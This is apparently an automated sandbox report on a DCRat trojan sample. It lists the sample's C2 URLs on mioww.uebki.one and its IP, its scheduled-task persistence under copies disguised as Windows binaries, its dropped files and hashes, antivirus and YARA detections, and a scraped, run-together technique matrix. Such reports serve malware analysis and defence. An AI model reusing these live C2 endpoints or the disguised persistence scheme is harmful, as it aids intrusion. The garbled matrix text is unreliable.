                            Process Discovery
                            Remote Desktop Protocol1
                            Clipboard Data
                            1
                            Ingress Tool Transfer
                            Exfiltration Over BluetoothNetwork Denial of Service
                            Email AddressesDNS ServerDomain AccountsAt1
                            DLL Side-Loading
                            1
                            DLL Side-Loading
                            131
                            Virtualization/Sandbox Evasion
                            Security Account Manager131
                            Virtualization/Sandbox Evasion
                            SMB/Windows Admin SharesData from Network Shared Drive3
                            Non-Application Layer Protocol
                            Automated ExfiltrationData Encrypted for Impact
                            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                            Process Injection
                            NTDS1
                            Application Window Discovery
                            Distributed Component Object ModelInput Capture113
                            Application Layer Protocol
                            Traffic DuplicationData Destruction
                            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                            Deobfuscate/Decode Files or Information
                            LSA Secrets2
                            File and Directory Discovery
                            SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts21
                            Obfuscated Files or Information
                            Cached Domain Credentials114
                            System Information Discovery
                            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                            Software Packing
                            DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                            DLL Side-Loading
                            Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
[Behavior graph. ID: 1502160; Sample: dmhu7oz5yP.exe; Startdate: 31/08/2024; Architecture: WINDOWS; Score: 100]
Top-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 17 other signatures
Top-level processes started: dmhu7oz5yP.exe; jnTUlYyDyuybgXdgxhTkT.exe; RuntimeBroker.exe; 6 other processes
dmhu7oz5yP.exe dropped: C:\Windows\...\jnTUlYyDyuybgXdgxhTkT.exe (PE32); C:\Windows\...\jnTUlYyDyuybgXdgxhTkT.exe (PE32); C:\Windows\Media\WinStore.App.exe (PE32); 14 other malicious files
dmhu7oz5yP.exe signatures: Drops PE files to the user root directory; Uses schtasks.exe or at.exe to add and modify task schedules; Creates processes via WMI
dmhu7oz5yP.exe started: cmd.exe (which started conhost.exe and w32tm.exe); schtasks.exe; schtasks.exe; 28 other processes
jnTUlYyDyuybgXdgxhTkT.exe DNS/IP: mioww.uebki.one, 188.114.97.3, 49730, 49731, 49732, CLOUDFLARENETUS, European Union
jnTUlYyDyuybgXdgxhTkT.exe signatures: Multi AV Scanner detection for dropped file; Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Source | Detection | Scanner | Label | Link
dmhu7oz5yP.exe | 79% | ReversingLabs | ByteCode-MSIL.Trojan.Mardom |
dmhu7oz5yP.exe | 80% | Virustotal | | Browse
dmhu7oz5yP.exe | 100% | Avira | HEUR/AGEN.1310064 |
dmhu7oz5yP.exe | 100% | Joe Sandbox ML | |
Source | Detection | Scanner | Label | Link
C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exe | 100% | Avira | HEUR/AGEN.1310064 |
C:\Recovery\jnTUlYyDyuybgXdgxhTkT.exe | 100% | Avira | HEUR/AGEN.1310064 |
C:\Recovery\jnTUlYyDyuybgXdgxhTkT.exe | 100% | Avira | HEUR/AGEN.1310064 |
C:\Users\Default\RuntimeBroker.exe | 100% | Avira | HEUR/AGEN.1310064 |
C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe | 100% | Avira | HEUR/AGEN.1310064 |
C:\Users\Default\RuntimeBroker.exe | 100% | Avira | HEUR/AGEN.1310064 |
C:\Recovery\jnTUlYyDyuybgXdgxhTkT.exe | 100% | Avira | HEUR/AGEN.1310064 |
C:\Windows\Media\WinStore.App.exe | 100% | Avira | HEUR/AGEN.1310064 |
C:\Users\user\AppData\Local\Temp\ZBWGzntvdU.bat | 100% | Avira | BAT/Delbat.C |
C:\Recovery\jnTUlYyDyuybgXdgxhTkT.exe | 100% | Avira | HEUR/AGEN.1310064 |
C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exe | 100% | Joe Sandbox ML | |
C:\Recovery\jnTUlYyDyuybgXdgxhTkT.exe | 100% | Joe Sandbox ML | |
C:\Recovery\jnTUlYyDyuybgXdgxhTkT.exe | 100% | Joe Sandbox ML | |
C:\Users\Default\RuntimeBroker.exe | 100% | Joe Sandbox ML | |
C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe | 100% | Joe Sandbox ML | |
C:\Users\Default\RuntimeBroker.exe | 100% | Joe Sandbox ML | |
C:\Recovery\jnTUlYyDyuybgXdgxhTkT.exe | 100% | Joe Sandbox ML | |
C:\Windows\Media\WinStore.App.exe | 100% | Joe Sandbox ML | |
C:\Recovery\jnTUlYyDyuybgXdgxhTkT.exe | 100% | Joe Sandbox ML | |
C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exe | 79% | ReversingLabs | ByteCode-MSIL.Trojan.Mardom |
C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe | 79% | ReversingLabs | ByteCode-MSIL.Trojan.Mardom |
C:\Recovery\jnTUlYyDyuybgXdgxhTkT.exe | 79% | ReversingLabs | ByteCode-MSIL.Trojan.Mardom |
C:\Users\Default\RuntimeBroker.exe | 79% | ReversingLabs | ByteCode-MSIL.Trojan.Mardom |
C:\Users\Public\Libraries\RuntimeBroker.exe | 79% | ReversingLabs | ByteCode-MSIL.Trojan.Mardom |
C:\Windows\Help\OEM\ContentStore\jnTUlYyDyuybgXdgxhTkT.exe | 79% | ReversingLabs | ByteCode-MSIL.Trojan.Mardom |
C:\Windows\Media\WinStore.App.exe | 79% | ReversingLabs | ByteCode-MSIL.Trojan.Mardom |
C:\Windows\Migration\WTR\jnTUlYyDyuybgXdgxhTkT.exe | 79% | ReversingLabs | ByteCode-MSIL.Trojan.Mardom |
C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe | 79% | ReversingLabs | ByteCode-MSIL.Trojan.Mardom |
                            No Antivirus matches
                            No Antivirus matches
                            SourceDetectionScannerLabelLink
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                            http://mioww.uH0%Avira URL Cloudsafe
                            http://mioww.uHrF0%Avira URL Cloudsafe
                            http://mioww.uebki.one/L1nc0In.php?LCTkyAhxuXJBDwmHP=RoIClfDarmNAWQEsEcAxbfeAz&AD=C45cXmCXIbxhYS4ktB100%Avira URL Cloudmalware
                            http://mioww.uebki.one/L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZ100%Avira URL Cloudmalware
                            http://mioww.uebki.one/0%Avira URL Cloudsafe
                            http://mioww.uebki.oneesda0%Avira URL Cloudsafe
                            http://mioww.uebki.one/L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&639581f8a680a8ebd5b9e74972d1a43d=d1nI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W&84ccbc5ddc4286bb9be5ede77b20cbca=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%Avira URL Cloudmalware
                            http://mioww.uebki.one/L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY100%Avira URL Cloudmalware
                            http://mioww.uebki.one/L1nc0In.php?LCTkyAhxuXJBDwmHP=RoIClfDarmNAWQEsEcAxbfeAz&AD=C45cXmCXIbxhYS4ktB27U&KGcUwJINkf9vpsRi9oBV5BN=CNkaF9HGT&79bfb28a16afb84a575d312c4453c517=f06eb19c95e712422ee4c585262cca64&5690ae1271d74814e0008b34a8c960fd=gY5QWY2UGO4EzYkRDO3MWO5YzYmRmY4YmYiJGO3cjZwMWY2I2YkJTY&LCTkyAhxuXJBDwmHP=RoIClfDarmNAWQEsEcAxbfeAz&AD=C45cXmCXIbxhYS4ktB27U&KGcUwJINkf9vpsRi9oBV5BN=CNkaF9HGT100%Avira URL Cloudmalware
                            http://mioww.uebki.one/@==gbJBzYuFDT0%Avira URL Cloudsafe
                            http://mioww.uebki.one0%Avira URL Cloudsafe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
mioww.uebki.one | 188.114.97.3 | true | true | | unknown
                              NameMaliciousAntivirus DetectionReputation
                              http://mioww.uebki.one/L1nc0In.php?LCTkyAhxuXJBDwmHP=RoIClfDarmNAWQEsEcAxbfeAz&AD=C45cXmCXIbxhYS4ktB27U&KGcUwJINkf9vpsRi9oBV5BN=CNkaF9HGT&79bfb28a16afb84a575d312c4453c517=f06eb19c95e712422ee4c585262cca64&5690ae1271d74814e0008b34a8c960fd=gY5QWY2UGO4EzYkRDO3MWO5YzYmRmY4YmYiJGO3cjZwMWY2I2YkJTY&LCTkyAhxuXJBDwmHP=RoIClfDarmNAWQEsEcAxbfeAz&AD=C45cXmCXIbxhYS4ktB27U&KGcUwJINkf9vpsRi9oBV5BN=CNkaF9HGTtrue
                              • Avira URL Cloud: malware
                              unknown
                              http://mioww.uebki.one/@==gbJBzYuFDTtrue
                              • Avira URL Cloud: safe
                              unknown
                              http://mioww.uebki.one/L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&639581f8a680a8ebd5b9e74972d1a43d=d1nI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W&84ccbc5ddc4286bb9be5ede77b20cbca=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
                              • Avira URL Cloud: malware
                              unknown
                              http://mioww.uebki.one/L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTYtrue
                              • Avira URL Cloud: malware
                              unknown
                              NameSourceMaliciousAntivirus DetectionReputation
                              http://mioww.uHjnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000003032000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002D61000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://mioww.uHrFjnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002EF5000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://mioww.uebki.one/L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZjnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002991000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002E25000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002B3B000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002A99000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002FCC000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002E8B000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002C4F000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002EC0000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002BD9000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002C84000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002B70000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002F93000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002FFD000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000003032000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002DEC000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002BA4000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 
00000013.00000002.4097626850.0000000002CB9000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002D61000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002E56000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002D24000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002B06000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: malware
                              unknown
                              http://mioww.uebki.oneesdajnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002991000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namedmhu7oz5yP.exe, 00000000.00000002.1672344237.0000000002794000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002991000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://mioww.uebki.one/jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002991000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: safe
                              unknown
                              http://mioww.uebki.one/L1nc0In.php?LCTkyAhxuXJBDwmHP=RoIClfDarmNAWQEsEcAxbfeAz&AD=C45cXmCXIbxhYS4ktBjnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002991000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: malware
                              unknown
                              http://mioww.uebki.onejnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002E56000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002D24000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002B06000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002CEF000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002F5F000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002D96000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002A60000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: safe
                              unknown
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
188.114.97.3 | mioww.uebki.one | European Union | | 13335 | CLOUDFLARENETUS | true
                              Joe Sandbox version:40.0.0 Tourmaline
                              Analysis ID:1502160
                              Start date and time:2024-08-31 10:11:04 +02:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 8m 58s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:42
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:dmhu7oz5yP.exe
                              renamed because original name is a hash value
                              Original Sample Name:ED9312F79BD3E7F4BEB41E56EA82512E.exe
                              Detection:MAL
                              Classification:mal100.troj.evad.winEXE@45/35@1/1
                              EGA Information:
                              • Successful, ratio: 22.2%
                              HCA Information:
                              • Successful, ratio: 91%
                              • Number of executed functions: 265
                              • Number of non-executed functions: 14
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Override analysis time to 240000 for current running targets taking high CPU consumption
                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                              • Execution Graph export aborted for target RuntimeBroker.exe, PID 7688 because it is empty
                              • Execution Graph export aborted for target RuntimeBroker.exe, PID 7720 because it is empty
                              • Execution Graph export aborted for target fontdrvhost.exe, PID 7584 because it is empty
                              • Execution Graph export aborted for target fontdrvhost.exe, PID 7604 because it is empty
                              • Execution Graph export aborted for target jnTUlYyDyuybgXdgxhTkT.exe, PID 7664 because it is empty
                              • Execution Graph export aborted for target upfc.exe, PID 3524 because it is empty
                              • Execution Graph export aborted for target upfc.exe, PID 5600 because it is empty
                              • Not all processes where analyzed, report is missing behavior information
                              • Report size exceeded maximum capacity and may have missing behavior information.
                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
04:11:56 | API Interceptor | 14493216x Sleep call for process: jnTUlYyDyuybgXdgxhTkT.exe modified
09:11:45 | Task Scheduler | Run new task: {C5E65FB5-D034-42FB-A6A3-B8591837A42A} path:
09:11:53 | Task Scheduler | Run new task: fontdrvhost path: "C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe"
09:11:53 | Task Scheduler | Run new task: fontdrvhostf path: "C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe"
09:11:53 | Task Scheduler | Run new task: jnTUlYyDyuybgXdgxhTkT path: "C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe"
09:11:53 | Task Scheduler | Run new task: jnTUlYyDyuybgXdgxhTkTj path: "C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe"
09:11:53 | Task Scheduler | Run new task: RuntimeBroker path: "C:\Users\Public\Libraries\RuntimeBroker.exe"
09:11:53 | Task Scheduler | Run new task: RuntimeBrokerR path: "C:\Users\Public\Libraries\RuntimeBroker.exe"
09:11:56 | Task Scheduler | Run new task: upfc path: "C:\Program Files (x86)\windows nt\Accessories\en-GB\upfc.exe"
09:11:57 | Task Scheduler | Run new task: upfcu path: "C:\Program Files (x86)\windows nt\Accessories\en-GB\upfc.exe"
09:11:57 | Task Scheduler | Run new task: WinStore.App path: "C:\Windows\Media\WinStore.App.exe"
09:11:57 | Task Scheduler | Run new task: WinStore.AppW path: "C:\Windows\Media\WinStore.App.exe"
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
188.114.97.3 | SecuriteInfo.com.Trojan.DownLoader47.19820.5694.3811.exe | Get hash | malicious | Unknown | Browse | rustmacro.ru/autoupdate.exe
 | QUOTATION_AUGQTRA071244#U00faPDF.scr.exe | Get hash | malicious | Unknown | Browse | filetransfer.io/data-package/DGApDW0P/download
 | QUOTATION_AUGQTRA071244#U00faPDF.scr.exe | Get hash | malicious | Unknown | Browse | filetransfer.io/data-package/DGApDW0P/download
 | QUOTATION_AUGQTRA071244#U00faPDF.scr.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | filetransfer.io/data-package/8hthkO24/download
 | gHPYUEh253.exe | Get hash | malicious | Djvu, Neoreklami, Stealc, Vidar, Xmrig | Browse | joxi.net/4Ak49WQH0GE3Nr.mp3
 | Izvod racuna u prilogu.exe | Get hash | malicious | DBatLoader, FormBook | Browse | www.coinwab.com/kqqj/
 | file.exe | Get hash | malicious | LummaC | Browse | joxi.net/4Ak49WQH0GE3Nr.mp3
 | Document_pdf.exe | Get hash | malicious | FormBook | Browse | www.x0x9x8x8x7x6.shop/dscg/
 | QUOTATION_AUGQTRA071244#U00b7PDF.scr | Get hash | malicious | Unknown | Browse | filetransfer.io/data-package/zbi9vNYx/download
 | z1209627360293827.exe | Get hash | malicious | DBatLoader, FormBook | Browse | www.coinwab.com/kqqj/
                              No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
CLOUDFLARENETUS | file.exe | Get hash | malicious | Unknown | Browse | 172.64.41.3
 | file.exe | Get hash | malicious | Unknown | Browse | 172.64.41.3
 | file.exe | Get hash | malicious | Unknown | Browse | 172.64.41.3
 | file.exe | Get hash | malicious | Unknown | Browse | 172.64.41.3
 | file.exe | Get hash | malicious | Unknown | Browse | 172.64.41.3
 | file.exe | Get hash | malicious | Unknown | Browse | 172.64.41.3
 | IrisMichael263Fiona.lib.exe | Get hash | malicious | LummaC | Browse | 188.114.96.3
 | http://flow-energy-3109.my.salesforce.com | Get hash | malicious | Unknown | Browse | 104.18.32.137
 | file.exe | Get hash | malicious | Unknown | Browse | 172.64.41.3
 | https://found.ee/5PKNr | Get hash | malicious | Unknown | Browse | 104.18.11.207
                              No context
                              No context
                              Process:C:\Users\user\Desktop\dmhu7oz5yP.exe
                              File Type:ASCII text, with very long lines (530), with no line terminators
                              Category:dropped
                              Size (bytes):530
                              Entropy (8bit):5.884752547117182
                              Encrypted:false
                              SSDEEP:6:hVbhxDie3acJBarsvzCkDqeE0IeX+BvkCqf2xuVBFdQbzkgZMeVnU9iX6Mtxi5NT:jbhpiCBaQvll+cN5CIgSet0Mxi7tG5x+
                              MD5:2A9A38473F9EE96330BF16E1F922F721
                              SHA1:A2A62D3EB6447F4B3E93497D47AF38C234EFDBA7
                              SHA-256:2CAD5914B857CFB92C16EE01F905427C324245075B280741A57DB03557F8BC97
                              SHA-512:E25227A7E0EE5FCDE89E7011C449936FCB3740AFBE557489836422C78222B0E7067E0166DD7E63D798C9965AE7CDC39181218F95CEE31B570E565E75385D187E
                              Malicious:false
                              Process:C:\Users\user\Desktop\dmhu7oz5yP.exe
                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):323072
                              Entropy (8bit):5.759825134174161
                              Encrypted:false
                              SSDEEP:6144:P54y2oo7KrA7bRCgxHV4casxgZ0BBxxqHsyQK4M0dxVbhaLr9u:P72N7J5FHVGZ0AQZRdx8Z
                              MD5:ED9312F79BD3E7F4BEB41E56EA82512E
                              SHA1:213D531F2CA1543ECC1AF3AD2B7FE56B4B027BFE
                              SHA-256:786B9891BC5CA12D44F2DF1A978F675693647EAED50DA66B92BDBD3C290BCA88
                              SHA-512:E057055CADB37DD8EE8F4C0308B19C8B19FA6274064C54B1927EC23DD80EEC2C952E1F35F54B8E4B60B7E128B23940FF13C460EE5CF85E20EEB5AA217FDAF4E3
                              Malicious:true
                              Yara Hits:
                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exe, Author: Joe Security
                              • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exe, Author: Joe Security
                              • Rule: MALWARE_Win_DCRat, Description: DCRat payload, Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exe, Author: ditekSHen
                              Antivirus:
                              • Antivirus: Avira, Detection: 100%
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              • Antivirus: ReversingLabs, Detection: 79%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb..........".................~.... ... ....@.. .......................`.......^....@.................................,...O.... .......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................`.......H.......H...............................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................
                              Process:C:\Users\user\Desktop\dmhu7oz5yP.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):26
                              Entropy (8bit):3.95006375643621
                              Encrypted:false
                              SSDEEP:3:ggPYV:rPYV
                              MD5:187F488E27DB4AF347237FE461A079AD
                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                              Malicious:true
                              Preview:[ZoneTransfer]....ZoneId=0
                              Process:C:\Users\user\Desktop\dmhu7oz5yP.exe
                              File Type:ASCII text, with very long lines (790), with no line terminators
                              Category:dropped
                              Size (bytes):790
                              Entropy (8bit):5.894070668899163
                              Encrypted:false
                              SSDEEP:12:64MWc/DzGc1bsDSR9dZ1TPAwEz+5MsjU+928+lglUMih5Xw4YiGb26yt:645Kqc1b3RTZKwEz+2HsIWa5XdYLyt
                              MD5:6D633AE1236DAEE651631F433FA224B5
                              SHA1:5E60B83A64CE7FCC0E8EBA89784E2695826D765C
                              SHA-256:4ED968418B0F486C220D755FFDF9BA43544BD70BA7B49F65E050C1DC278E78F0
                              SHA-512:8127C4483C162CC75066EFD0362B303AB028ADCB97A0F9741DB507A5EE86A96594A712876FB59EA6F6F25C750BD892154D1A7348AA4868659A0B1B8147CBD370
                              Malicious:false
                              Process:C:\Users\user\Desktop\dmhu7oz5yP.exe
                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):323072
                              Entropy (8bit):5.759825134174161
                              Encrypted:false
                              SSDEEP:6144:P54y2oo7KrA7bRCgxHV4casxgZ0BBxxqHsyQK4M0dxVbhaLr9u:P72N7J5FHVGZ0AQZRdx8Z
                              MD5:ED9312F79BD3E7F4BEB41E56EA82512E
                              SHA1:213D531F2CA1543ECC1AF3AD2B7FE56B4B027BFE
                              SHA-256:786B9891BC5CA12D44F2DF1A978F675693647EAED50DA66B92BDBD3C290BCA88
                              SHA-512:E057055CADB37DD8EE8F4C0308B19C8B19FA6274064C54B1927EC23DD80EEC2C952E1F35F54B8E4B60B7E128B23940FF13C460EE5CF85E20EEB5AA217FDAF4E3
                              Malicious:true
                              Yara Hits:
                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe, Author: Joe Security
                              • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe, Author: Joe Security
                              • Rule: MALWARE_Win_DCRat, Description: DCRat payload, Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe, Author: ditekSHen
                              Antivirus:
                              • Antivirus: Avira, Detection: 100%
